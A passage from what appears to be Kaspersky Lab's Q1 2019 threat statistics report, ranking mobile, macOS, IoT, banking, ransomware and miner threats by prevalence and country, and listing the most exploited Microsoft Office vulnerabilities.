DangerousObject.AndroidOS.GenericML | 4.35 \n5 | Trojan-Banker.AndroidOS.Asacub.a | 3.49 \n6 | Trojan-Dropper.AndroidOS.Hqwar.bb | 3.36 \n7 | Trojan-Dropper.AndroidOS.Lezok.p | 2.60 \n8 | Trojan-Banker.AndroidOS.Agent.ep | 2.53 \n9 | Trojan.AndroidOS.Dvmap.a | 1.84 \n10 | Trojan-Banker.AndroidOS.Svpeng.q | 1.83 \n11 | Trojan-Banker.AndroidOS.Asacub.cp | 1.78 \n12 | Trojan.AndroidOS.Agent.eb | 1.74 \n13 | Trojan.AndroidOS.Agent.rt | 1.72 \n14 | Trojan-Banker.AndroidOS.Asacub.ce | 1.70 \n15 | Trojan-SMS.AndroidOS.Prizmes.a | 1.66 \n16 | Exploit.AndroidOS.Lotoor.be | 1.59 \n17 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.57 \n18 | Trojan-Dropper.AndroidOS.Tiny.d | 1.51 \n19 | Trojan-Banker.AndroidOS.Svpeng.ak | 1.49 \n20 | Trojan.AndroidOS.Triada.dl | 1.47 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked._\n\nAs is customary, first place in the Top 20 for Q1 went to the DangerousObject.Multi.Generic verdict (54.26%), which we use for malware detected using [cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies are deployed when the antivirus databases lack data for detecting a piece of malware, but the company's cloud already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place came Trojan.AndroidOS.Boogr.gsh (12.72%). This verdict is assigned to files recognized as malicious by our system [based on machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird place went to the Trojan-Banker.AndroidOS.Asacub.snt banker (4.98%). In Q1, this family was well represented in our Top 20: four positions out of 20 (3rd, 5th, 11th, 14th).\n\nThe DangerousObject.AndroidOS.GenericML verdict (4.35%), which ranked fourth in Q1, is perhaps the most interesting. It is given to files detected by machine learning. But unlike the Trojan.AndroidOS.Boogr.gsh verdict, which is assigned to malware that is processed and detected inside Kaspersky Lab's infrastructure, the DangerousObject.AndroidOS.GenericML verdict is given to files on the side of users of the company's security solutions before such files go for processing. The latest threat patterns are now detected this way.\n\nSixth and seventeenth places were taken by members of the Hqwar dropper family: Trojan-Dropper.AndroidOS.Hqwar.bb (3.36%) and Trojan-Dropper.AndroidOS.Hqwar.gen (1.57%), respectively. These packers most often contain banking Trojans, including Asacub.\n\nSeventh position belonged to Trojan-Dropper.AndroidOS.Lezok.p (2.60%). The Lezok family is notable for its variety of distribution schemes, among them a supply chain attack, whereby the malware is sewn into the firmware of the mobile device before delivery to the store. This is very dangerous for two reasons:\n\n * It is extremely difficult for an ordinary user to determine whether their device is already infected.\n * Getting rid of such malware is highly complex.\n\nThe Lezok Trojan family is designed primarily to display persistent ads, sign users up for paid SMS subscriptions, and inflate counters for apps on various platforms.\n\nThe last Trojan worthy of a mention on the topic of the Top 20 mobile threats is Trojan-Banker.AndroidOS.Agent.ep. It is encountered both in standalone form and inside Hqwar droppers. The malware has extensive capabilities for countering dynamic analysis, and can detect being launched in the Android Emulator or Genymotion environment. It can open arbitrary web pages to phish for login credentials. It uses Accessibility Services to obtain various rights and interact with other apps.\n\n### Geography of mobile threats\n\n_Map of mobile malware infection attempts, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172806/en-mobile-malware-map.png>)\n\nTop 10 countries by share of users attacked by mobile malware:\n\n| Country* | %** \n---|---|--- \n1 | Pakistan | 37.54 \n2 | Iran | 31.55 \n3 | Bangladesh | 28.38 \n4 | Algeria | 24.03 \n5 | Nigeria | 22.59 \n6 | India | 21.53 \n7 | Tanzania | 20.71 \n8 | Indonesia | 17.16 \n9 | Kenya | 16.27 \n10 | Mexico | 12.01 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nPakistan (37.54%) ranked first, with the largest number of users in this country being attacked by AdWare.AndroidOS.Agent.f, AdWare.AndroidOS.Ewind.h, and AdWare.AndroidOS.HiddenAd.et adware.\n\nSecond place was taken by Iran (31.55%), which appears consistently in the Top 10 every quarter. The most commonly encountered malware in this country was Trojan.AndroidOS.Hiddapp.bn, as well as the potentially unwanted apps RiskTool.AndroidOS.Dnotua.yfe and RiskTool.AndroidOS.FakGram.a. Of these three, the latter is the most noteworthy \u2013 the main task of this app is to intercept Telegram messages. It should be mentioned that Telegram is banned in Iran, so any of its clones are in demand, as confirmed by the infection statistics.\n\nThird place went to Bangladesh (28.38%), where in Q1 the same advertising apps were weaponized as in Pakistan.\n\n### Mobile banking Trojans\n\nIn the reporting period, we detected **29,841** installation packages for mobile banking Trojans, almost 11,000 more than in Q4 2018.\n\nThe greatest contributions came from the creators of the Trojan-Banker.AndroidOS.Svpeng (20% of all detected banking Trojans), the second-place Trojan-Banker.AndroidOS.Asacub (18%), and the third-place Trojan-Banker.AndroidOS.Agent (15%) families.\n\n_Number of installation packages for mobile banking Trojans, Q2 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171308/banking-malware-apk.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.snt | 23.32 \n2 | Trojan-Banker.AndroidOS.Asacub.a | 16.35 \n3 | Trojan-Banker.AndroidOS.Agent.ep | 11.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.q | 8.57 \n5 | Trojan-Banker.AndroidOS.Asacub.cp | 8.33 \n6 | Trojan-Banker.AndroidOS.Asacub.ce | 7.96 \n7 | Trojan-Banker.AndroidOS.Svpeng.ak | 7.00 \n8 | Trojan-Banker.AndroidOS.Agent.eq | 4.96 \n9 | Trojan-Banker.AndroidOS.Asacub.ar | 2.47 \n10 | Trojan-Banker.AndroidOS.Hqwar.t | 2.10 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by banking threats._\n\nThis time, fully half the Top 10 banking threats are members of the Trojan-Banker.AndroidOS.Asacub family: five positions out of ten. The creators of this Trojan actively distributed samples throughout Q1. In particular, the number of users attacked by the Asacub.cp Trojan reached 8,200 per day. But even this high result was surpassed by Asacub.snt with 13,000 users per day at the peak of the campaign.\n\nIt was a similar story with Trojan-Banker.AndroidOS.Agent.ep: We recorded around 3,000 attacked users per day at its peak. However, by the end of the quarter, the average daily number of attacked unique users had dropped below 1,000. Most likely, this was due not to decreased demand for the Trojan, but to cybercriminals' transition to a two-stage system of infection using Hqwar droppers.\n\n_Geography of mobile banking threats, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171335/en-banking-malware-map.png>)\n\n**Top 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Australia | 0.81 \n2 | Turkey | 0.73 \n3 | Russia | 0.64 \n4 | South Africa | 0.35 \n5 | Ukraine | 0.31 \n6 | Tajikistan | 0.25 \n7 | Armenia | 0.23 \n8 | Kyrgyzstan | 0.17 \n9 | US | 0.16 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nIn Q1 2019, Australia (0.81%) took first place in our Top 10. The most common infection attempts we registered in this country were by Trojan-Banker.AndroidOS.Agent.eq and Trojan-Banker.AndroidOS.Agent.ep. Both types of malware are not exclusive to Australia, and used for attacks worldwide.\n\nSecond place was taken by Turkey (0.73%), where, as in Australia, Trojan-Banker.AndroidOS.Agent.ep was most often detected.\n\nRussia is in third place (0.64%), where we most frequently detected malware from the Asacub and Svpeng families.\n\n### Mobile ransomware\n\nIn Q1 2019, we detected **27,928** installation packages of mobile ransomware, which is 3,900 more than in the previous quarter.\n\n_Number of mobile ransomware installation packages detected by Kaspersky Lab (Q2 2018 \u2013 Q1 2019)_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171455/mobile-ransomware.png>)\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ah | 28.91 \n2 | Trojan-Ransom.AndroidOS.Rkor.h | 19.42 \n3 | Trojan-Ransom.AndroidOS.Svpeng.aj | 9.46 \n4 | Trojan-Ransom.AndroidOS.Small.as | 8.81 \n5 | Trojan-Ransom.AndroidOS.Rkor.snt | 5.36 \n6 | Trojan-Ransom.AndroidOS.Svpeng.ai | 5.21 \n7 | Trojan-Ransom.AndroidOS.Small.o | 3.24 \n8 | Trojan-Ransom.AndroidOS.Fusob.h | 2.74 \n9 | Trojan-Ransom.AndroidOS.Small.ce | 2.49 \n10 | Trojan-Ransom.AndroidOS.Svpeng.snt | 2.33 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile security solutions that were attacked by ransomware._\n\nIn Q1 2019, the most common mobile ransomware family was Svpeng with four positions in the Top 10.\n\n_Geography of mobile ransomware, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171523/en-mobile-ransomware-map.png>)\n\nTop 10 countries by share of users attacked by mobile ransomware:\n\n| Country* | %** \n---|---|--- \n1 | US | 1.54 \n2 | Kazakhstan | 0.36 \n3 | Iran | 0.28 \n4 | Pakistan | 0.14 \n5 | Mexico | 0.10 \n6 | Saudi Arabia | 0.10 \n7 | Canada | 0.07 \n8 | Italy | 0.07 \n9 | Indonesia | 0.05 \n10 | Belgium | 0.05 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000)._ \n_** Unique users attacked by mobile ransomware as a percentage of all users of Kaspersky Lab's mobile security solutions in this country._\n\nThe Top 3 countries by number of users attacked by mobile ransomware, as in the previous quarter, were the US (1.54%), Kazakhstan (0.36%), and Iran (0.28%)\n\n## Attacks on Apple macOS\n\nOn the topic of threats to various platforms, such a popular system as macOS cannot be ignored. Although new malware families for this platform are relatively rare, threats do exist for it, largely in the shape of adware.\n\nThe modus operandi of such apps is widely known: infect the victim, take root in the system, and show advertising banners. That said, for each ad displayed and banner clicked the attackers receive a very modest fee, so they need:\n\n 1. The code that displays the advertising banner to run as often as possible on the infected machine,\n 2. The victim to click on the banners as often as possible,\n 3. As many victims as possible.\n\nIt should be noted that the adware infection technique and adware behavior on the infected machine at times differ little from malware. Meanwhile, the banners themselves can be shown in an arbitrary place on the screen at any time, be it in an open browser window, in a separate window in the center of the screen, etc.\n\n### Top 20 threats for macOS\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Downloader.OSX.Shlayer.a | 24.62 \n2 | AdWare.OSX.Spc.a | 20.07 \n3 | AdWare.OSX.Pirrit.j | 10.31 \n4 | AdWare.OSX.Pirrit.p | 8.44 \n5 | AdWare.OSX.Agent.b | 8.03 \n6 | AdWare.OSX.Pirrit.o | 7.45 \n7 | AdWare.OSX.Pirrit.s | 6.88 \n8 | AdWare.OSX.Agent.c | 6.03 \n9 | AdWare.OSX.MacSearch.a | 5.95 \n10 | AdWare.OSX.Cimpli.d | 5.72 \n11 | AdWare.OSX.Mcp.a | 5.71 \n12 | AdWare.OSX.Pirrit.q | 5.55 \n13 | AdWare.OSX.MacSearch.d | 4.48 \n14 | AdWare.OSX.Agent.a | 4.39 \n15 | Downloader.OSX.InstallCore.ab | 3.88 \n16 | AdWare.OSX.Geonei.ap | 3.75 \n17 | AdWare.OSX.MacSearch.b | 3.48 \n18 | AdWare.OSX.Geonei.l | 3.42 \n19 | AdWare.OSX.Bnodlero.q | 3.33 \n20 | RiskTool.OSX.Spigot.a | 3.12 \n \n_* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab's security solutions for macOS that were attacked._\n\nTrojan-Downloader.OSX.Shlayer.a (24.62%) finished first in our ranking of macOS threats. Malware from the Shlayer family is distributed under the guise of Flash Player or its updates. Their main task is to download and install various advertising apps, including Bnodlero.\n\nAdWare.OSX.Spc.a (20.07%) and AdWare.OSX.Mcp.a (5.71%) are typical adware apps that are distributed together with various \"cleaner\" programs for macOS. After installation, they write themselves to the autoloader and run in the background.\n\nMembers of the AdWare.OSX.Pirrit family add extensions to the victim's browser; some versions also install a proxy server on the victim's machine to intercept traffic from the browser. All this serves one purpose \u2013 to inject advertising into web pages viewed by the user.\n\nThe malware group consisting of AdWare.OSX.Agent.a, AdWare.OSX.Agent.b, and AdWare.OSX.Agent.c is closely related to the Pirrit family, since it often downloads members of the latter. It can basically download, unpack, and launch different files, as well as embed JS code with ads into web pages seen by the victim.\n\nAdWare.OSX.MacSearch is another family of advertising apps with extensive tools for interacting with the victim's browser. It can manipulate the browser history (read/write), change the browser search system to its own, add extensions, and embed advertising banners on pages viewed by the user. Plus, it can download and install other apps without the user's knowledge.\n\nAdWare.OSX.Cimpli.d (5.72%) is able to download and install other advertising apps, but its main purpose is to change the browser home page and install advertising extensions. As with other adware apps, all these actions have the aim of displaying ads in the victim's browser.\n\nThe creators of the not-a-virus:Downloader.OSX.InstallCore family, having long perfected their tricks on Windows, transferred the same techniques to macOS. The typical InstallCore member is in fact an installer (more precisely, a framework for creating an installer with extensive capabilities) of other programs that do not form part of the main InstallCore package and are downloaded separately. Besides legitimate software, it can distribute less salubrious apps, including ones containing aggressive advertising. Among other things, InstallCore is used to distribute DivX Player.\n\nThe AdWare.OSX.Geonei family is one of the oldest adware families for macOS. It employs creator-owned obfuscation techniques to counteract security solutions. As is typical for adware programs, its main task is to display ads in the browser by embedding them in the HTML code of the web-page.\n\nLike other similar apps, AdWare.OSX.Bnodlero.q (3.33%) installs advertising extensions in the user's browser, and changes the default search engine and home page. What's more, it can download and install other advertising apps.\n\n### Threat geography\n\n| Country* | %** \n---|---|--- \n1 | France | 11.54 \n2 | Spain | 9.75 \n3 | India | 8.83 \n4 | Italy | 8.20 \n5 | US | 8.03 \n6 | Canada | 7.94 \n7 | UK | 7.52 \n8 | Russia | 7.51 \n9 | Brazil | 7.45 \n10 | Mexico | 6.99 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's security solutions for macOS (under 10,000)._ \n_** Unique attacked users as a percentage of all users of Kaspersky Lab's security solutions for macOS in the country._\n\nIn Q1 2019, France (11.54%) took first place in the Top 10. The most common infection attempts we registered in this country came from Trojan-Downloader.OSX.Shlayer.a, AdWare.OSX.Spc.a \u0438 AdWare.OSX.Bnodlero.q.\n\nUsers from Spain (9.75%), India (8.83%), and Italy (8.20%) \u2013 who ranked second, third, and fourth, respectively \u2013 most often encountered Trojan-Downloader.OSX.Shlayer.a, AdWare .OSX.Spc.a, AdWare.OSX.Bnodlero.q, AdWare.OSX.Pirrit.j, and AdWare.OSX.Agent.b\n\nFifth place in the ranking went to the US (8.03%), which saw the same macOS threats as Europe. Note that US residents also had to deal with advertising apps from the Climpi family.\n\n## IoT attacks\n\n### Interesting events\n\nIn Q1 2019, we noticed several curious features in the behavior of IoT malware. First, some Mirai samples were equipped with a tool for artificial environment detection: If the malware detected it was running in a sandbox, it stopped working. The implementation was primitive \u2013 scanning for the presence of procfs.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172955/it-threat-stats-q1-2019-6.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172955/it-threat-stats-q1-2019-6.png>)\n\nBut we expect it to become more complex in the near future.\n\nSecond, one of the versions of Mirai was spotted to contain a mechanism for clearing the environment of other bots. It works using templates, killing the process if its name matches that of the template. Interestingly, Mirai itself ended up in the list of such names (the malware itself does not contain \"mirai\" in the process name):\n\n * dvrhelper\n * dvrsupport\n * **mirai**\n * blade\n * demon\n * hoho\n * hakai\n * satori\n * messiah\n * mips\n\nLastly, a few words about a miner with an old exploit for Oracle Weblogic Server, although it is not actually an IoT malware, but a Trojan for Linux.\n\nTaking advantage of the fact that Weblogic Server is cross-platform and can be run on a Windows host or under Linux, the cybercriminals embedded checks for different operating systems, and are now attacking Windows hosts along with Linux.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22173014/it-threat-stats-q1-2019-7.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22173014/it-threat-stats-q1-2019-7.png>)\n\n_Section of code responsible for attacking Windows and Linux hosts_\n\n### IoT threat statistics\n\nQ1 demonstrated that there are still many devices in the world that attack each other through telnet. Note, however, that it has nothing to do with the qualities of the protocol. It is just that devices or servers managed through SSH are closely monitored by administrators and hosting companies, and any malicious activity is terminated. This is one reason why there are significantly fewer unique addresses attacking via SSH than there are IP addresses from which the telnet attacks come. \n \nSSH | 17% \nTelnet | 83% \n \n_Table of the popularity distribution of attacked services by number of unique IP addresses of devices that carried out attacks, Q1 2019_\n\nNevertheless, cybercriminals are actively using powerful servers to manage their vast botnets. This is seen by the number of sessions in which cybercriminal servers interact with Kaspersky Lab's traps. \n \nSSH | 64% \nTelnet | 36% \n \n_Table of distribution of cybercriminal working sessions with Kaspersky Lab's traps, Q1 2019_\n\nIf attackers have SSH access to an infected device, they have far greater scope to monetize the infection. In the overwhelming majority of cases involving intercepted sessions, we registered spam mailings, attempts to use our trap as a proxy server, and (least often of all) cryptocurrency mining.\n\n### Telnet-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's telnet traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171650/en-iot-telnet-map.png>)\n\nTop 10 countries where devices were located that carried out telnet-based attacks on Kaspersky Lab's traps.\n\n| Country | %* \n---|---|--- \n1 | Egypt | 13.46 \n2 | China | 13.19 \n3 | Brazil | 11.09 \n4 | Russia | 7.17 \n5 | Greece | 4.45 \n6 | Jordan | 4.14 \n7 | US | 4.12 \n8 | Iran | 3.24 \n9 | India | 3.14 \n10 | Turkey | 2.49 \n \n_* Infected devices in the country as a percentage of the total number of all infected IoT devices attacking via telnet._\n\nIn Q1 2019, Egypt (13.46%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab's traps. Second place by a small margin goes to China (13.19%), with Brazil (11.09%) in third.\n\nCybercriminals most often used telnet attacks to infect devices with one of the many Mirai family members.\n\n**Top 10 malware downloaded to infected IoT devices following a successful telnet attack**\n\n| Verdict | %* \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 71.39 \n2 | Backdoor.Linux.Mirai.ba | 20.15 \n3 | Backdoor.Linux.Mirai.au | 4.85 \n4 | Backdoor.Linux.Mirai.c | 1.35 \n5 | Backdoor.Linux.Mirai.h | 1.23 \n6 | Backdoor.Linux.Mirai.bj | 0.72 \n7 | Trojan-Downloader.Shell.Agent.p | 0.06 \n8 | Backdoor.Linux.Hajime.b | 0.06 \n9 | Backdoor.Linux.Mirai.s | 0.06 \n10 | Backdoor.Linux.Gafgyt.bj | 0.04 \n \n_* Share of malware in the total amount of malware downloaded to IoT devices following a successful telnet attack_\n\nIt is worth noting that bots based on Mirai code make up most of the Top 10. There is nothing surprising about this, and the situation could persist for a long time given Mirai's universality.\n\n### SSH-based attacks\n\n_Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab's SSH traps, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171814/en-iot-ssh-map.png>)\n\nTop 10 countries in which devices were located that carried out SSH-based attacks on Kaspersky Lab's traps.\n\n| Verdict | %* \n---|---|--- \n1 | China | 23.24 \n2 | US | 9.60 \n3 | Russia | 6.07 \n4 | Brazil | 5.31 \n5 | Germany | 4.20 \n6 | Vietnam | 4.11 \n7 | France | 3.88 \n8 | India | 3.55 \n9 | Egypt | 2.53 \n10 | Korea | 2.10 \n \n_* Infected devices in the country as a percentage of the total number of infected IoT devices attacking via SSH_\n\nMost often, a successful SSH-based attack resulted in the following types of malware downloaded of victim's device: Backdoor.Perl.Shellbot.cd, Backdoor.Perl.Tsunami.gen, and Trojan-Downloader.Shell.Agent.p\n\n## Financial threats\n\n### Quarterly highlights\n\nThe banker Trojan DanaBot, detected in [Q2](<https://securelist.com/it-threat-evolution-q2-2018-statistics/87170/>), continued to grow actively. The new modification not only updated the communication protocol with the C&C center, but expanded the list of organizations targeted by the malware. Whereas last quarter the main targets were located in Australia and Poland, in Q3 organizations in Austria, Germany, and Italy were added.\n\nRecall that DanaBot has a modular structure and can load additional plugins to intercept traffic, steal passwords, and hijack crypto wallets. The malware was distributed through spam mailings with a malicious office document, which was used to download the main body of the Trojan.\n\n### Financial threat statistics\n\nIn Q1 2019, Kaspersky Lab solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 243,604 users.\n\n_Number of unique users attacked by financial malware, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171934/en-finance.png>)\n\n### Attack geography\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky Lab products that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23125708/en-finance-map.png>)\n\n#### Top 10 countries by share of attacked users\n\n**Country*** | **%**** \n---|--- \nSouth Korea | 2.2 \nChina | 2.1 \nBelarus | 1.6 \nVenezuela | 1.6 \nSerbia | 1.6 \nGreece | 1.5 \nEgypt | 1.4 \nPakistan | 1.3 \nCameroon | 1.3 \nZimbabwe | 1.3 \n \n_* Excluded are countries with relatively few Kaspersky Lab product users (under 10,000)._ \n_** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky Lab products in the country._\n\n### Top 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | RTM | Trojan-Banker.Win32.RTM | 27.42 \n2 | Zbot | Trojan.Win32.Zbot | 22.86 \n3 | Emotet | Backdoor.Win32.Emotet | 9.36 \n4 | Trickster | Trojan.Win32.Trickster | 6.57 \n5 | Nymaim | Trojan.Win32.Nymaim | 5.85 \n6 | Nimnul | Virus.Win32.Nimnul | 4.59 \n7 | SpyEye | Backdoor.Win32.SpyEye | 4.29 \n8 | Neurevt | Trojan.Win32.Neurevt | 3.56 \n9 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.64 \n10 | Tinba | Trojan-Banker.Win32.Tinba | 1.39 \n \n_** Unique users attacked by this malware as a percentage of all users attacked by financial malware._\n\nIn Q1 2019, the familiar Trojan-Banker.Win32.RTM (27.4%), Trojan.Win32.Zbot (22.9%), and Backdoor.Win32.Emotet (9.4%) made up the Top 3. In fourth place was Trojan.Win32.Trickster (6.6%), and fifth was Trojan.Win32.Nymaim (5.9%).\n\n## Ransomware programs\n\n### Quarterly highlights\n\nThe most high-profile event of the quarter was probably the [LockerGoga ransomware attack](<https://ics-cert.kaspersky.com/news/2019/03/22/metallurgical-giant-norsk-hydro-attacked-by-encrypting-malware/>) on several major companies. The ransomware code itself constitutes nothing new, but the large-scale infections attracted the attention of the media and the public. Such incidents yet again spotlight the issue of corporate and enterprise network security, because in the event of penetration, instead of using ransomware (which would immediately make itself felt), cybercriminals can install spyware and steal confidential data for years on end without being noticed.\n\nA vulnerability was discovered in the popular WinRAR archiver that allows an arbitrary file to be placed in an arbitrary directory when unpacking an ACE archive. The cybercriminals did not miss the chance to [assemble an archive](<https://www.bleepingcomputer.com/news/security/jneca-ransomware-spread-by-winrar-ace-exploit/>) that unpacks the executable file of the JNEC ransomware into the system autorun directory.\n\nFebruary saw [attacks](<https://www.bleepingcomputer.com/forums/t/691852/cr1ptt0r-ransomware-files-encrypted-readmetxt-support-topic/>) on network-attached storages (NAS), in which Trojan-Ransom.Linux.Cryptor malware was installed on the victim device, encrypting data on all attached drives using elliptic-curve cryptography. Such attacks are especially dangerous because NAS devices are often used to store backup copies of data. What's more, the victim tends to be unaware that a separate device running Linux might be targeted by intruders.\n\nNomoreransom.org partners, in cooperation with cyber police, [created](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>) a utility for decrypting files impacted by GandCrab (Trojan-Ransom.Win32.GandCrypt) up to and including version 5.1. It helps victims of the ransomware to restore access to their data without paying a ransom. Unfortunately, as is often the case, shortly after the public announcement, the cybercriminals updated the malware to version 5.2, which cannot be decrypted by this tool.\n\n### Statistics\n\n#### Number of new modifications\n\nThe number of new modifications fell markedly against Q4 2018 to the level of Q3. Seven new families were identified in the collection.\n\n_Number of new ransomware modifications, Q1 2018 \u2013 Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172044/ransomware-new-modification.png>)\n\n#### Number of users attacked by ransomware Trojans\n\nIn Q1 2019, Kaspersky Lab products defeated ransomware attacks against 284,489 unique KSN users.\n\nIn February, the number of attacked users decreased slightly compared with January; however, by March we recorded a rise in cybercriminal activity.\n\n_Number of unique users attacked by ransomware Trojans, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172107/en-ransomware-users.png>)\n\n### Attack geography\n\nGeography of mobile ransomware Trojans, Q1 2019[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22171149/en-ransomware-map.png>)\n\n#### Top 10 countries attacked by ransomware Trojans\n\n| **Country*** | **% of users attacked by cryptors**** \n---|---|--- \n1 | Bangladesh | 8.11 \n2 | Uzbekistan | 6.36 \n3 | Ethiopia | 2.61 \n4 | Mozambique | 2.28 \n5 | Nepal | 2.09 \n6 | Vietnam | 1.37 \n7 | Pakistan | 1.14 \n8 | Afghanistan | 1.13 \n9 | India | 1.11 \n10 | Indonesia | 1.07 \n \n* Excluded are countries with relatively few Kaspersky Lab users (under 50,000). \n** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.\n\n#### Top 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 26.25 | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 18.98 | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.33 | \n4 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.76 | \n5 | Shade | Trojan-Ransom.Win32.Shade | 3.54 | \n6 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 3.50 | \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.82 | \n8 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.02 | \n9 | Crysis/Dharma | Trojan-Ransom.Win32.Crusis | 1.51 | \n10 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 1.20 | \n \n_* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data._ \n_** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\n## Miners\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q1 2019, Kaspersky Lab solutions detected 11,971 new modifications of miners.\n\n_Number of new miner modifications, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172216/en-miners-modifications.png>)\n\n#### Number of users attacked by miners\n\nIn Q1, we detected attacks using miners on the computers of 1,197,066 unique users of Kaspersky Lab products worldwide.\n\n_Number of unique users attacked by miners, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172326/en-miners-users.png>)\n\n### Attack geography\n\n_Number of unique users attacked by miners, Q1 2019 _[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/23131558/en-miner-map.png>)\n\n#### Top 10 countries by share of users attacked by miners\n\n| **Country*** | **%**** \n---|---|--- \n1 | Afghanistan | 12.18 \n2 | Ethiopia | 10.02 \n3 | Uzbekistan | 7.97 \n4 | Kazakhstan | 5.84 \n5 | Tanzania | 4.73 \n6 | Ukraine | 4.28 \n7 | Mozambique | 4.17 \n8 | Belarus | 3.84 \n9 | Bolivia | 3.35 \n10 | Pakistan | 3.33 \n \n_* Excluded are countries with relatively few Kaspersky Lab users (under 50,000)._ \n_** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable applications used by cybercriminals\n\nStatistics for Q1 2019 show that vulnerabilities in Microsoft Office are still being utilized more often than those in other applications, due to their easy exploitability and highly stable operation. The percentage of exploits for Microsoft Office did not change much compared to the previous quarter, amounting to 69%.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q1 2019_[ (download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/05/22172438/exploits.png>)\n\nThis quarter's most popular vulnerabilities in the Microsoft Office suite were [CVE-2017-11882](<https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/17-year-old-ms-office-flaw-cve-2017-11882-actively-exploited-in-the-wild>) and [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>). They relate to the Equation Editor component, and cause buffer overflow with subsequent remote code execution. Lagging behind the chart leaders by a factor of almost two is [CVE-2017-8570](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570>), a logical vulnerability and an analog of the no less popular [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>). Next comes [CVE-2017-8759](<https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>), where an error in the 